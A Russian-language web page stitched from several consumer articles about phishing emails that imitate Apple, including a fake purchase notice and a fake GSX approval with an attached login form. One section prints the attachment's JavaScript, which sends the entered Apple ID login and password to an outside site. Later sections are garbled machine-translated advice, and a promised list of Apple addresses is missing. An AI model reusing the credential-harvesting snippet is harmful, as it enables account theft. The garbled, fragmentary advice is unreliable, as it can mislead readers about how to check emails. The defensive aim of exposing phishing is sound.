Защита Apple ID от взлома, или как отличать настоящие письма Apple от фейковых
На днях, на наш редакторский E-mail, который является Apple ID, пришло письмо якобы от Apple, в котором сообщается, что нами совершена покупка приложения, стоимостью $21. В письме сказано, что “если вы не совершали эту покупку, то ее можно отменить по этой ссылке…, если ничего не предпринять, то деньги спишутся”.
Подобные письма мы получаем очень часто и с улыбкой удаляем их. Для чего мошенники рассылают такие письма, и как распознать фальшивое сообщение мы расскажем ниже.
Расчет мошенников прост – как только пользователь видит, что с него вот-вот начнут снимать рубли, евро или доллары, он сразу же пойдёт разбираться. В письме есть и специальная ссылка для отмены заказа (подписки).
После перехода по ней пользователь оказывается на поддельном сайте, который внешне выглядит как страничка App Store. На нём есть форма приема данных о кредитной карте – её нужно заполнить для того, чтобы не допустить списания денег.
В реальности, конечно, происходит прямо противоположный процесс – деньги вам не вернут, а заберут.
При этом, купертиновцы напоминают, что сотрудники фирменного магазина приложений App Store ни при каких обстоятельствах не будут запрашивать у вас личную информацию и платежные данные.
Кстати, у Apple есть отличная инструкция о том, как отличить реальное письмо из компании от фишингового. Прочитать её полностью можно здесь, ключевые положения приводятся ниже:
- Проверьте адрес, с которого пришло письмо.
Ниже приведен перечень действительных электронных адресов Apple, по ссылкам из которых переходить безопасно:
Внимание! Сегодня нам на почту пришло странное письмо… от Apple
В закладки
На ваш почтовый ящик часто приходит спам? Он бывает разный: рекламный, с просьбой о помощи каким-то неведомым африканским товарищам, попавшим в сложную финансовую ситуацию, рассылка из сервисов… Сегодня на почтовый адрес нашей редакции пришло любопытное письмо… от Apple.
Вернее, так можно было подумать на первый взгляд, но при детальном рассмотрении содержимого письма стало сразу же понятно, что это фейковый почтовый адрес, цель которого — получение пароля и логина от Apple ID.
Само письмо выглядит следующим образом:
Из короткого сообщения мы узнали, что наша заявка в качестве участника программы Global Service Exchange (GSX) одобрена. Все, что нужно для активации — загрузить прилагающийся архив и ввести данные Apple ID в прилагающейся форме.
Самое интересно в том, что никакой заявки на участие в GSX ни один из членов нашей редакции не подавал.
GSX — это специализированный инструмент, который Apple выдает ограниченному кругу специалистов с целью осуществления сервисного обслуживания в рамках программы AppleCare. В работе используется iOS Diagnostics Apple, либо магазин-посредник, который позволяет связать с устройством клиента для получения необходимой информации.
Полученное письмо действительно выглядит правдоподобно: кратко, по делу, с подтверждением заявки и главной — адрес отправителя. Весьма реалистичный адрес [email protected] — в том же домене, что и Apple и без дополнительных приписок.
Внутри архива есть единственный файл в формате *.shtml. Открываем — обычная форма, которая полностью совпадает с оригиналом от Apple:
Разумеется, вводить Apple ID в подозрительное окно мы не стали.
В прикрепленном файле был обнаружен следующий код:
[jscript]
xmlhttp_rkchk.open(‘POST’,’http://nubetelstore.com/admin3667/123/checkapp2.php’,true);
xmlhttp_rkchk.setRequestHeader(‘Content-Type’,’application/x-www-form-urlencoded;charset=utf8′);
xmlhttp_rkchk.send(‘e=’+accountname+’&p=’+accountpassword);
[/jscript]
Он передает логин и пароль на сайт nubetelstore.com
В whois без палева указан email и телефон хостера. А фишинговый сайт до сих по не заблокирован. Мы сообщим им об этой проблеме.
Хозяева сайта скорее всего не знают о том, что он используется для воровства аккаунтов. Это новый PHP-сайт, беглый осмотр html-кода которого показал, что он возможно был написан людьми, которые не думали о безопасности и делали по принципу: «Чтобы работало». С большой вероятностью nublestore.com был взломан и используется мошенниками без ведома его владельцев.
Как выяснилось, полученное нами письмо — распространенный вариант фишинга, который от имени [email protected] действует с февраля месяца. Достаточно ввести данные своего аккаунта, как вы тут же попадаетесь на крючок злоумышленника и полностью теряете контроль на своим аккаунтом.
Будьте внимательны и никогда не вводите данные своей учетной записи в подозрительные формы. Фишинг — штука тонкая и адрес [email protected] выглядел весьма правдоподобно. Если бы кто-то из нашей большой команды сайта действительно подавал заявку на участие в Global Service Exchange, подвоха мы сразу могли бы и не заметить.
В закладки
Noreply email apple com что это
Если вы не уверены, что письмо о программе Store и в iTunes Store или купить Apple, Музыка является законным, эти советы могут помочь.
Мошенники часто пытаются обмануть вас в обмен личную или финансовую информацию путем отправки вам сообщения или ссылки на сайты, которые могут выглядеть, как будто они от Apple, но их истинной целью является, чтобы украсть вашу информацию о счете. Некоторые фишинговых писем будет просить вас, чтобы нажать на ссылку Обновить информацию об учетной записи. Другие могут выглядеть квитанция за покупки в магазине приложений, в iTunes Store и iBooks или для Apple музыки, что вы уверены, что не делают.
Никогда не вводите данные вашей учетной записи на веб-сайтах, ссылки на эти сообщения, и никогда не загружать или открывать вложения, включенных в них.
Это письмо законным?
Если вы получите по электронной почте сообщение о Приложение магазин или приобрести в магазине iTunes, и вы не знаете, реально ли это, вы можете искать несколько вещей, которые могут помочь подтвердить, что сообщение именно от Apple.
Подлинные чеки—от покупки покупки в App Store и в iTunes Store или Apple, Музыка—включите ваш текущий адрес, который мошенники вряд ли придется. Вы можете также просмотреть свой магазин приложений, в iTunes Store или iBooks Store или Apple, Музыка история покупок.
Сообщения о ваших App магазин, магазин в iTunes Store или покупки Apple Музыка никогда не будет просить вас предоставить эту информацию по электронной почте:
- Номер Социального Страхования
- Девичья фамилия матери
- Полный номер кредитной карты
- Код кредитной карты CCV в
Пополнить счет информация благополучно
Если вы получите электронное письмо с просьбой пополнить счет или платежную информацию, только в настройках непосредственно на вашем iPhone, iPad или iPod, в iTunes или App Store на компьютере Mac, или в программе iTunes на ПК.
Чтобы обновить ваш пароль для Apple ID, который вы используете для покупки, это сделать только в настройках на вашем устройстве или на appleid.apple.com.
Если вы получили или действовали по вероятности фишинга сообщение:
Если вы получили подозрительное письмо, пожалуйста, перешлите его на reportphishing@apple.com. Если вы находитесь на Mac, выберите сообщение электронной почты и выберите пункт переслать как вложение из меню сообщение.
Если вы думаете, вы могли бы ввел личную информацию, как пароль или информации о кредитных картах на сайте мошенников, немедленно измените пароль вашей учетной записи Apple.
Noreply email apple com что за почта
Toggle Dark Mode
Today, almost every Apple user has come across a fake email that appears to have been sent by Apple. We present to you a thorough guide to determine whether the email message truly originated from Apple, or is actually a scam targeted to gain information about your email account, Apple ID, or even worse – your credit card. While the process might seem highly-technical at first, we’re sure that most people will be able to understand this tutorial quickly and easily.